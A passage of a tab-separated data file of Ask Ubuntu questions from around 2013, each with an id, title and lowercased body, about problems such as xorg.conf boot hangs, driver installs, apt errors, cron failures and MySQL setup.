resources on that host . ideas ? thanks : )
309555	system wo n't boot when xorg.conf exists	problem : i need to create a /etc/x11/xorg.conf file to get my graphics to work correctly , yet whenever i create one using xorg -configure and place xorg.conf.new there , x wo n't start after a reboot . what i am doing that is n't working : first i go into tty3 with ctrlaltt , then execute the following commands : sudo stop lightdm sudo xorg -configure sudo mv xorg.conf.new /etc/x11/xorg.conf sudo reboot after i reboot the system hangs on the plymouth boot screen , though the animation does n't work ( it just hangs with no dots filled ) . i can still get into x by going into recovery mode , then selecting resume normal boot . x still works perfectly well when i have deleted then /etc/x11/xorg.conf file except for having 1024x768 resolution . this is the terminal output of sudo xorg -configure : http : //paste.ubuntu.com/5776296/ here is the xorg.conf.new file that sudo xorg -configure creates : http : //paste.ubuntu.com/5776297/ system info : i have an optimus system with a sandybridge mobile and a geforce 555m . i have this problem with lubuntu 13.04 , ubuntugnome 13.04 , and regular ubuntu 12.04 , 12.10 , and 13.04 . all 64bit . those are the only ones i am listing because those are the only ones that i have tested it on . lspci output : daboross : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf106m [ geforce gt 555m ] ( rev a1 ) xrandr output : daboross : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* 800x600 61.0 note that that xrandr output is when i had the nomodeset grub linux cmd parameter , and a newer xrandr output is below . my screen resolution is 1366x768 . this happens with and without bumblebee , also it still happens in lubuntu , ubuntugnome , and regular ubuntu . why i need xorg.conf : since installing lubuntu , my screen has been using 1024x768 resolution instead of 1366x768 , which is pretty annoying . i followed the instructions here , but i ca n't get the creation of xorg.conf to work correctly . edited info : after removing nomodeset from grub 's cmdline_linux , my resolution is back to normal . it is now 1366x768 correctly . xrandr output after removing nomodeset : daboross : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) after removing nomodeset , i no longer need to create an xorg.conf file , though the problem persist that if i do create one , x wo n't start .
309560	please help me , install ubuntu alongside windows 8	i do n't intend to duplicate the question , but i have n't found this same problem . i 'm newbie and now i 'm trying to install ubuntu 12.04 lts alongside windows 8 . my storage are partitioned as : 120 gb ntfs windows 8 loader 340 gb ntfs my data 128 gb unallocation unit , and i plan to install ubuntu here . i tried to install ubuntu with default option ( install ubuntu alongside windows8 ) , let it partition itself . first , i found problem that ubuntu can not install grub and it let me choose device myself . i ca n't choose ext4 which i installed ubuntu in . in this case can i choose the same drive as windows 8 loader to install grub ? second attempted , i did partition 100 mb ext2 and hope grub installed in here . installation completely finished without warning . i press restart but grub is n't appear , it boots into windows 8 automatically . my question may annoy you guy , but i wan na try ubuntu really . help me please . thank you very much : )
309571	ubuntu - internet isnt working nor popping up	i am completely new to ubuntu , like literally , i only know a few commands and stuff for terminal.. i recently installed it into my laptop to learn it more but for some odd reason my wifi wont pick up , nor will it accept wired connections.. im currently running version 12.04 and i 'm in dire need of assistance . i wish i could give you guys more to work with but im stoked , i have no idea how to fix this . i tried changing my interface settings ( gksu gedit /etc/network/interfaces ) to auto eth0 iface eth0 inet dhcp with was a method i found on google but no luck.. can anyone help me out please ? ? ? ? -edit- when i type dmesg | grep -i eth i get this [ 0.094674 ] [ firmware bug ] : acpi : no _bqc method , can not determine initial brightness [ 0.104787 ] acpi error : method parse/execution failed [ \_sb_.pci0._osc ] ( node f5029dc8 ) , ae_aml_operand_type ( 20120320/psparse-536 ) [ 0.109074 ] acpi error : method parse/execution failed [ \_sb_.pci0._osc ] ( node f5029dc8 ) , ae_aml_operand_type ( 20120320/psparse-536 ) [ 0.109130 ] acpi error : method parse/execution failed [ \_sb_.pci0._osc ] ( node f5029dc8 ) , ae_aml_operand_type ( 20120320/psparse-536 ) [ 1.794527 ] [ firmware bug ] : acpi : no _bqc method , can not determine initial brightness [ 16.730616 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 and when i type dmesg | grep -i net i get this . [ 0.000000 ] transmeta genuinetmx86 [ 0.084004 ] net : registered protocol family 16 [ 0.114632 ] netlabel : initializing [ 0.114633 ] netlabel : domain hash size = 128 [ 0.114635 ] netlabel : protocols = unlabeled cipsov4 [ 0.114648 ] netlabel : unlabeled traffic allowed by default [ 0.163609 ] net : registered protocol family 2 [ 0.163898 ] net : registered protocol family 1 [ 0.163898 ] audit : initializing netlink socket ( disabled ) [ 0.783442 ] net : registered protocol family 10 [ 0.783652 ] net : registered protocol family 17 [ 16.013583 ] kernel bug at include/net/cfg80211.h:2351 ! [ 16.419997 ] net : registered protocol family 31 [ 16.730616 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 17.261656 ] type=1400 audit ( 1371348543.594:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=669 comm= '' apparmor_parser '' [ 20.441385 ] type=1400 audit ( 1371348546.774:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=843 comm= '' apparmor_parser ''
309572	apache tomcat cluster	i am trying to run 2 tomcat servers in cluster , i have made necessary changes in server.xml of each of those , but while starting server i am getting following error , what can be the issue ? ? jun 18 , 2013 12:57:55 pm org.apache.catalina.core.aprlifecyclelistener init info : the apr based apache tomcat native library which allows optimal performance in production environments was not found on the java.library.path : /usr/lib/jvm/java-6-openjdk-i386/jre/lib/i386/client : /usr/lib/jvm/java-6-openjdk-i386/jre/lib/i386 : /usr/lib/jvm/java-6-openjdk-i386/jre/../lib/i386 : /usr/java/packages/lib/i386 : /usr/lib/i386-linux-gnu/jni : /lib/i386-linux-gnu : /usr/lib/i386-linux-gnu : /usr/lib/jni : /lib : /usr/lib jun 18 , 2013 12:57:56 pm org.apache.tomcat.util.digester.digester endelement warning : no rules found matching 'server/service/engine/membership ' . jun 18 , 2013 12:57:56 pm org.apache.tomcat.util.digester.digester endelement warning : no rules found matching 'server/service/engine/receiver ' . jun 18 , 2013 12:57:56 pm org.apache.tomcat.util.digester.digester endelement warning : no rules found matching 'server/service/engine/sender ' . jun 18 , 2013 12:57:56 pm org.apache.tomcat.util.digester.digester endelement warning : no rules found matching 'server/service/engine/deployer ' . jun 18 , 2013 12:57:56 pm org.apache.coyote.abstractprotocol init info : initializing protocolhandler [ `` ajp-bio-8009 '' ] jun 18 , 2013 12:57:56 pm org.apache.catalina.startup.catalina load info : initialization processed in 807 ms jun 18 , 2013 12:57:56 pm org.apache.catalina.core.standardservice startinternal info : starting service catalina jun 18 , 2013 12:57:56 pm org.apache.catalina.core.standardengine startinternal info : starting servlet engine : apache tomcat/7.0.41 jun 18 , 2013 12:57:56 pm org.apache.catalina.cluster.tcp.simpletcpcluster start info : cluster is about to start jun 18 , 2013 12:57:56 pm org.apache.catalina.cluster.tcp.simpletcpcluster start severe : unable to start cluster . java.lang.nullpointerexception at org.apache.catalina.cluster.tcp.simpletcpcluster.start ( simpletcpcluster.java:410 ) at org.apache.catalina.core.containerbase.startinternal ( containerbase.java:1106 ) at org.apache.catalina.core.standardengine.startinternal ( standardengine.java:302 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) at org.apache.catalina.core.standardservice.startinternal ( standardservice.java:443 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) at org.apache.catalina.core.standardserver.startinternal ( standardserver.java:732 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) at org.apache.catalina.startup.catalina.start ( catalina.java:684 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:616 ) at org.apache.catalina.startup.bootstrap.start ( bootstrap.java:322 ) at org.apache.catalina.startup.bootstrap.main ( bootstrap.java:456 ) jun 18 , 2013 12:57:56 pm org.apache.catalina.startup.catalina start severe : catalina.start : org.apache.catalina.lifecycleexception : failed to start component [ standardserver [ 8005 ] ] at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:154 ) at org.apache.catalina.startup.catalina.start ( catalina.java:684 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:616 ) at org.apache.catalina.startup.bootstrap.start ( bootstrap.java:322 ) at org.apache.catalina.startup.bootstrap.main ( bootstrap.java:456 ) caused by : org.apache.catalina.lifecycleexception : failed to start component [ standardservice [ catalina ] ] at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:154 ) at org.apache.catalina.core.standardserver.startinternal ( standardserver.java:732 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) ... 7 more caused by : org.apache.catalina.lifecycleexception : failed to start component [ standardengine [ catalina ] ] at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:154 ) at org.apache.catalina.core.standardservice.startinternal ( standardservice.java:443 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) ... 9 more caused by : org.apache.catalina.lifecycleexception : java.lang.nullpointerexception at org.apache.catalina.cluster.tcp.simpletcpcluster.start ( simpletcpcluster.java:434 ) at org.apache.catalina.core.containerbase.startinternal ( containerbase.java:1106 ) at org.apache.catalina.core.standardengine.startinternal ( standardengine.java:302 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) ... 11 more caused by : java.lang.nullpointerexception at org.apache.catalina.cluster.tcp.simpletcpcluster.start ( simpletcpcluster.java:410 ) ... 14 more jun 18 , 2013 12:57:56 pm org.apache.catalina.startup.catalina start info : server startup in 151 ms
309587	optimizing 12.04 lts for matlab r2013a	good day i would like to know what steps could be taken to optimize ubuntu 12.04 lts for running matlab r2013a ( 64bit ) . we have run the same test on the same machine with windows 7 , windows 2008 server and ubuntu 12.04 lts ( 64bit ) , and ubuntu performed the worst . i was very surprised as i was rooting for ubuntu ( luckily i did not enter into any bets ! ) . looking forward to some insightful answers . pieter breedt stellenbosch , south africa
309593	ubuntu 13.04 , mounting 2nd hdd , lost home directory	i hope someone can help . i installed a 2nd hdd , set up 2 partitions on it . i set up both partitions to mount automatically in /etc/ftsab . one of the partitions has a mount point of my home directory /home/nick trouble is , i forgot to copy everything from the original /home/nick before testing my /etc/fstab by rebooting . ( yes , i 'm an idiot ) . now i can not log in ( it just bounces back to the login screen ) , and when i go to a terminal ( ctrl+alt+f1 ) and log in there , my home dir is empty . when i comment out the changes in /etc/fstab , i still can not log in . i even created a new user , and can not log in with that either . my questions : is there any way of recovering my lost home directory ? how can i unbrick my system ? thanks ...
309599	dropbox very high cpu usage without any actual data transfer	the dropbox process constantly clocks more than 50 % cpu usage sometimes going up to the higher 80s and 90s . at the same time it does not even upload/download the files it is supposed to . the progress is stuck at the same point and the dropbox daemon has not uploaded/downloaded more than one file in the last 24 hours . we are only talking about small files like pictures ( ~ 4-10 mb each ) . the effect this has on my laptop is that it overheats , sometimes with core temperatures up to 15-20 degrees above normal . the cpu utilization and temperature fall noticeably after i kill the dropbox daemon . i have had this problem for more than a week now . i am using xubuntu 12.04 . i have more than enough local disk space available ( 8 gb in the disk where home and root are mounted ) and 20 gb free space in my dropbox account . i have 2 gb ram . i have also tried the following process ( mentioned in this question : dropbox is taking too much cpu time . how can i fix it ? ) : sudo apt-get purge nautilus-dropbox rm -r $ home/.dropbox* sudo apt-get install nautlius-dropbox but it made no difference to the problem at hand .
309602	ubuntu wo n't load after installing nvidia-current drivers	i recently did a fresh install for ubuntu 13.04 64 bit . everything was working fine until i tried to install drivers for my nvidia gt640 . i followed the steps in the answer to the question on this link askubuntu.com/questions/291199/ubuntu-13-04-installation-nvidia-driver after this command sudo /sbin/lsmod | grep nvidia i did n't see the nvidia drivers loaded . after the following two commands sudo depmod -a sudo modprobe nvidia_current i get the message that nvidia_current package ca n't be located . now after restating the computer , i login and all i can see is the wallpaper . icons wo n't load and i do n't think the wifi connects either because i ca n't seem to install anything from the terminal . any help is greatly appreciated
309604	box sync for ubuntu , as window , mac os x ?	is there any solution to have box sync for ubuntu ( like dropbox , ubuntu one ... ) , as window , mac os x ? https : //www.box.com/settings/sync
309608	nautilus : no modification , access dates for folder	when looking folder properties i dont see properties like modification date or accessed date . screenshot ( folder properties on right ) i am on ubuntu 12.04
309610	chromium browser not loading youtube video	i am using ubuntu and have chromium installed in it . for every video on you tube it is giving me an error that the video is not available . i had installed flash player too but it is not working . i do n't know why it is happening . on clicking to learn more link , the help is answering like the video is removed or currently unavailable which is not possible as it could not be the case for every video on you tube .
309612	data recovery of file with special file extension	this question might seem 's to be similar but it is not , what i want to ask is as follows , i have a flash drive . it had files in it which are very important to me . but accidentally it was formatted . yes there are tools to recover data like foremost , scalpel . and i used them to recover my deleted data , but my problem was n't solved . these tools are best to recover file with well known formats , like jpg , png , gif , pdf etc . the data that i actually wanted back was present in an hidden folder . and in case of ubuntu a hidden folder 's name starts with a ' . ' ( dot ) . moreover the files in it were images but with the extension '.hid ' . eg : files with name like 'myphoto.jpg.hid ' were present in that hidden folder . i first created an image ( .img ) file of my flash drive using the 'dd ' , and tried to recover the data using foremost and scalpel . though i got all the file with popular file extensions , but did n't get those file with '.hid ' extension . is there a way to recover those files with that special ( '.hid ' ) file extension which were present in that hidden folder . please help me out ! those files are very important to me ! thank you !
309613	run smartgit in ubuntu 13.04	i have downloaded a smartgit 4.5.5 and trying to use in ubuntu 13.04 . but the problem is when i double click on the script smartgithg.sh it opens on the gedit . on the previous versions of ubuntu i did not face this issues . in the previous versions , when i double click on the script it shows me few options like 'run ' , 'run in terminal ' , 'close ' and so on . here i would like to mention that the execution permission is enabled for this script . and i can run the script via terminal .
309615	how to install postgresql-8.4 ?	sudo add-apt-repository ppa : pitti/postgresql # ... ok sudo apt-get install postgresql-8.4 reading package lists ... done building dependency tree reading state information ... done package postgresql-8.4 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'postgresql-8.4 ' has no installation candidate should i download it from http : //packages.debian.org/squeeze/postgresql-8.4 and manually install all the dependencies ?
309618	full disk encryption with lvm2 fails after kernel update	i am running ubuntu 12.04 with full disk encryption . this was implemented as per the guide here : http : //57un.wordpress.com/2013/02/01/full-disk-encryption-using-ubuntu-in-most-secure-mode-with-aes-xts-plain64/ this was working fine until the kernel was upgraded from 3.5.0-32-generic to 3.5.0-34-generic . now during boot , the encrypted partition fails to mount and drops into ( initramfs ) prompt with the following . gave up waiting for root device . ... alert ! /dev/mapper/crypt does not exist . dropping to a shell ! the system will still boot okay when the previous kernel is selected in grub . i understand that the boot process requires a different step or image to enable lvm2 to mount the encrypted root prior to booting , but am not sure where or how to troubleshoot and correct the problem . i have tried creating a new initrd sudo update-initramfs -u update-initramfs : generating /boot/initrd.img-3.5.0-34-generic extract from grub.cfg broken : menuentry 'ubuntu , with linux 3.5.0-34-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root f4554fcf-eba8-4cb0-96ea-1427fff02328 linux /vmlinuz-3.5.0-34-generic root=/dev/mapper/crypt ro quiet splash $ vt_handoff initrd /initrd.img-3.5.0-34-generic } works : menuentry 'ubuntu , with linux 3.5.0-32-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root f4554fcf-eba8-4cb0-96ea-1427fff02328 linux /vmlinuz-3.5.0-32-generic root=/dev/mapper/crypt ro quiet splash $ vt_handoff initrd /initrd.img-3.5.0-32-generic } any suggestions ? cheers
309626	how to check what type my video card is and its memory size ?	i need to install some programs that require minimal size of video card memory , how do i get the size and possibly what vendor and type of my video card ? output of lspci | grep vga | cut -d `` `` -f 1 | xargs lspci -vv -s : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : elitegroup computer systems device 9981 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 44 region 0 : memory at f0000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 1800 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915
309628	show icon in alt-tab menu using .desktop file	after googling for hours , i did n't find any answer for the following issue and so glad if anyone could help . i use ubuntu 12.04 lts with gnome-shell 3.4.1 . consider the following simple program in file $ home/a.py which i have made it executable : # ! /usr/bin/env python import gtk w = gtk.window ( ) w.set_size_request ( 250 , 150 ) w.set_title ( `` test program '' ) w.connect ( 'destroy ' , lambda x : gtk.main_quit ( ) ) w.show_all ( ) gtk.main ( ) i 've used menulibre to define a_run0.desktop in $ home/.local/share/applications as below : [ desktop entry ] version=1.0 type=application name=a_run comment=comm . icon=applications-development exec=/home/vsop/a.py path= terminal=false startupnotify=true categories= name [ en_us ] =a_run comment [ en_us ] =comm . i made a_run0.desktop to be executable and i see a file named “a_run” in $ home/.local/share/applications with proper icon ( icon=applications-development ) . running the program and using alt-tab , the icon is also shown in alt-tab menu quite well . the question is , when i copy “a_run” file ( actually a_run0.desktop ) to $ home/desktop , the file is shown with correct icon in desktop but after running it , the icon shown in alt-tab menu is changed to unknown-red-circle-icon with the name of original file “a.py” underneath . what is made this problem and how can i see the defined-icon ( in .desktop file ) correctly in the alt-tab menu after running the program from $ home/desktop ?
309634	how to permanently disable ubuntu updates & hide install updates button pic included	how to permanently disable ubuntu updates pop up & hide or remove install updates button pic included see below :
309643	partition table unrecognized on gparted , shown wrong in disks	i had dual boot on my old laptop ( 2006 ) , with win xp and ubuntu 13.04 witch was installed after the xp , and everything worked well for me . so , as per usual , i decided to re-install my xp , witch actually halfway crashed with some `` random error '' ... anyway , i can live without it ( almost ) ... after rebooting , i found out that the grub or/and mbr is gone ( messed up ) . i managed to rescue these with the ubuntu live-cd and big help from askubuntu community . yet , the thing are not the same as before ... - hdd shown as entirely unallocated , information about unallocated . due to my state of newbie , i ca n't even describe the problem well , so uploading some pictures so you can see what i have . i would lie to have more space on my primary linux partition , but before that - i want my partition table to be recognized , as well as to cease the overlap of the partitions ... - no partition 3 , it 's a content of a extended partition 2 . please ask for more info as needed , i 'll try my best to gather it for you , on a same way i 'm discovering and learning ubuntu . any thought is appreciated . thank you . ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ this is what i see after run sudo fdisk -lu terminal omitting empty partition ( 5 ) disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5e6e6c09 device boot start end blocks id system /dev/sda1 * 63 78482484 39241211 7 hpfs/ntfs/exfat /dev/sda2 78483454 312560639 117038593 f w95 ext 'd ( lba ) /dev/sda3 107780148 312560639 102390246 7 hpfs/ntfs/exfat /dev/sda5 78483456 105826303 13671424 83 linux /dev/sda6 105828352 107780095 975872 82 linux swap / solaris
309650	how to upgrade ubuntu 12.04 to 13.10 ?	my ubuntu has a problem with the ubuntu software center and i ca n't solve it , but i 'd like to try the new version of ubuntu , 13.10 . i 'm using ubuntu 12.04 , can i upgrade to 13.10 how can i do that ? its not dublicate : )
309657	windows 7 to ubuntu 12.04 resources	i am planing to switch operating systems ( currently using windows 7 x64 . from windows 7 to ubuntu 12.04 lts ) my main reason why i am switching to ubuntu 12.04 lts is to try my luck with it . currently windows 7 really consumes a lot of cpu and ram . if we 're going to look at it who consumes less cpu and ram . is it windows 7 or ubuntu 12.04 ? additional info . -both os are running on the same hardware , computer specifications amd a6 apu dual core with 2.7ghz 8gb of ram
309658	how to outline fonts in a pdf ( or eps ) file ?	say , i have a pdf graphic ( such a plot made with matplotlib , mathematica or similar ) , which contains vector art and text . the text uses non-standard or proprietary fonts ( such computer modern if inline-tex is used ) . the fonts are ( usually ) embedded and the pdf renders nicely in evince/acroread . i 'd like to edit/share the pdf without relying on those fonts , e.g . in inkscape . is their tool that will convert all text to paths ? inkscape is not suitable here because it will replace the non-standard font with `` sans '' . pdf2svg has issues with line art .
309660	sudo apt-get update leads to crash of terminal application	i try to run sudo apt-get update and the terminal freezes and a message pops up : ubuntu experienced an internal error ... i am trying to work with openfoam and all the times is asking me to update things and when i try it , it gets stuck . ubuntu version is 12.04 .
309668	how to discover the ip addresses within a network with a bash script ?	is it possible to determine the ip addresses of systems within a network using a bash script ? and how ?
309669	the number 3 is not displayed in the menu bar 's clock applet	see image . this is how the current time is displayed -- the '3 ' from '13:39:22 ' and '2:57:31pm ' is missing ... any idea how to fix this ? ( seems to 've started after latsted upgrade , yesterday ) clock at time '13:49:22 ' : clock at time '2:57:31pm ' : list of apt sources in use ( could do with a cleaning up , i guess ) : user @ host : ~ $ grep ^ /etc/apt/sources.list /etc/apt/sources.list.d/* -h deb http : //de.archive.ubuntu.com/ubuntu/ quantal main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ quantal-security main restricted universe multiverse deb http : //extras.ubuntu.com/ubuntu/ quantal main deb http : //dl.google.com/linux/talkplugin/deb/ stable main deb http : //dl.google.com/linux/talkplugin/deb/ stable main deb http : //dl.google.com/linux/talkplugin/deb/ stable main deb http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu quantal main deb-src http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu quantal main deb http : //archive.canonical.com/ubuntu quantal partner # added by software-center deb http : //archive.canonical.com/ubuntu precise partner # added by software-center deb http : //archive.canonical.com/ubuntu quantal partner # added by software-center deb http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu precise main deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu quantal main deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu quantal main deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu quantal main deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu quantal main
309672	problem with 'sudo apt-get upgrade '	when i run sudo apt-get upgrade , the following error rises : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 the following packages will be upgraded : accountsservice apport apt apt-transport-https apt-utils aptitude bash bash-completion bind9-host curl dbus dmsetup dnsutils icedtea-6-jre-cacao icedtea-6-jre-jamvm iptables isc-dhcp-client isc-dhcp-common language-selector-common libaccountsservice0 libapt-inst1.4 libapt-pkg4.12 libasound2 libbind9-80 libc-bin libc-dev-bin libc6 libc6-dev libcups2 libcupsimage2 libcurl3 libcurl3-gnutls libdbus-1-3 libdevmapper1.02.1 libdns81 libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libgnutls26 libisc83 libisccc80 libisccfg82 liblwres80 libmysqlclient-dev libmysqlclient18 libnspr4 libnss3 libnss3-1d libplymouth2 libservlet2.5-java libssl-dev libssl-doc libssl1.0.0 libtiff4 libtomcat6-java libudev0 libx11-6 libx11-data libx11-xcb1 libxcb-glx0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb1 libxext6 libxfixes3 libxi6 libxinerama1 libxml2 libxrender1 libxslt1.1 libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 linux-libc-dev multiarch-support mysql-client mysql-client-core-5.5 mysql-common mysql-server nginx nginx-common nginx-full openjdk-6-jre-headless openjdk-6-jre-lib openssh-client openssh-server openssl perl perl-base perl-modules plymouth plymouth-theme-ubuntu-text python-apport python-apt python-apt-common python-mysqldb python-paramiko python-problem-report rsyslog tomcat6 tomcat6-admin tomcat6-common tomcat6-docs tomcat6-examples udev 112 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . need to get 0 b/88.4 mb of archives . after this operation , 204 kb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % preconfiguring packages ... dpkg-deb : error : subprocess tar was killed by signal ( segmentation fault ) , core dumped dpkg : error processing /var/cache/apt/archives/bash_4.2-2ubuntu2.1_i386.deb ( -- unpack ) : subprocess dpkg-deb -- control returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/bash_4.2-2ubuntu2.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : i tried sudo apt-get clean & & sudo apt-get -- reinstall install bash , it outputs reading package lists ... done building dependency tree reading state information ... done suggested packages : bash-doc the following packages will be upgraded : bash 1 upgraded , 0 newly installed , 0 to remove and 114 not upgraded . need to get 616 kb of archives . after this operation , 12.3 kb disk space will be freed . get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main bash i386 4.2-2ubuntu2.1 [ 616 kb ] fetched 616 kb in 1s ( 591 kb/s ) dpkg-deb : error : subprocess tar was killed by signal ( segmentation fault ) , core dumped dpkg : error processing /var/cache/apt/archives/bash_4.2-2ubuntu2.1_i386.deb ( -- unpack ) : subprocess dpkg-deb -- control returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/bash_4.2-2ubuntu2.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) my problem seems to be with bash package as alaa said
309674	cron fails at night	i have set up a cron job , but for some reason it fails to run during the night . the same job runs fine when i 'm running it during the day ( i.e . setting up the same job to run in a few minutes and waiting for it to run ) . some logs : jun 17 14:04:01 server cron [ 20174 ] : ( root ) cmd ( /home/server/scripts/sync.sh > > /home/server/logs/nightly.log 2 > & 1 ) jun 17 14:12:01 server cron [ 20349 ] : ( root ) cmd ( /home/server/scripts/sync.sh > > /home/server/logs/nightly.log 2 > & 1 ) jun 17 14:23:01 server cron [ 20513 ] : ( root ) cmd ( /home/server/scripts/sync.sh > > /home/server/logs/nightly.log 2 > & 1 ) jun 18 01:00:01 server cron [ 25717 ] : ( root ) cmd ( /home/server/scripts/sync.sh > > /home/server/logs/nightly.log 2 > & 1 ) # this runs during the night jun 18 01:00:01 server cron [ 25706 ] : ( cron ) error ( grandchild # 25717 failed with exit status 2 ) # does n't leave anything behind it , not even the nightly.log file - as though the command itself is invalid ) cron entry looks like this : 0 1 * * * /home/server/scripts/sync.sh > > /home/server/logs/nightly.log 2 > & 1 script looks like this : # ! /bin/bash success=0 echo `` running nightly automation ... '' echo `` running xxxx script ... '' success=`/home/server/scripts/xxxx.sh & & echo 1` if [ $ success -eq 1 ] ; then echo `` xxxx success ! '' else echo `` xxxx fail ! '' fi echo `` running rsync ... '' /usr/bin/rsync -am -- remove-source-files /path1/ /path2/ -- log-file=/home/server/logs/sync.log & & echo `` rsync success ! ''
309677	mysql 5.6.12 installation from source code	i downloaded the mysql-5.6.12 source code from the official website and extracted its contents in /usr/lib but the problem im facing is now how do i install it ? i followed the steps to install it it was like shell > groupadd mysql shell > useradd -r -g mysql mysql shell > cd /usr/local shell > tar zxvf /path/to/mysql-version-os.tar.gz shell > ln -s full-path-to-mysql-version-os mysql shell > cd mysql shell > chown -r mysql . shell > chgrp -r mysql . shell > scripts/mysql_install_db -- user=mysql shell > chown -r root . shell > chown -r mysql data next command is optional shell > cp support-files/my-medium.cnf /etc/my.cnf shell > bin/mysqld_safe -- user=mysql & next command is optional shell > cp support-files/mysql.server /etc/init.d/mysql.server but the problem im facing is : shell > /scripts/mysql_install_db there is no file named mysql_install_db but has a filenamed /scripts/mysql_secure_installation.pl.in can anyone suggest me how to install mysql in my ubuntu 12.04 . please help . i have tried other steps as well but nothing seems to work .
309679	ca n't install updates due to boot folder size on 13.04	update attempt delivers message 'not enough free disk space ' with the recommendation to free up space on /boot . i have tried all the clean up techniques i know , but essentially it is filled with all necessary stuff . what i ca n't understand is why the /boot volume is limited to only 40mb when there is 800gb free on my hard drive ? what should i do about this ? thanks ! i have only ubuntu installed , but the machine came with win 8 .
309691	sorting files in the ubuntu one cloud	i store a lot of files on ubuntu one so i can download them to my work pc as necessary . i do n't want to sync automatically to my work pc . it would be much easier to find current files of you could sort on date modified or date uploaded , as you can with dropbox . is this possible ? if not , are there any plans to introduce it ? thanks
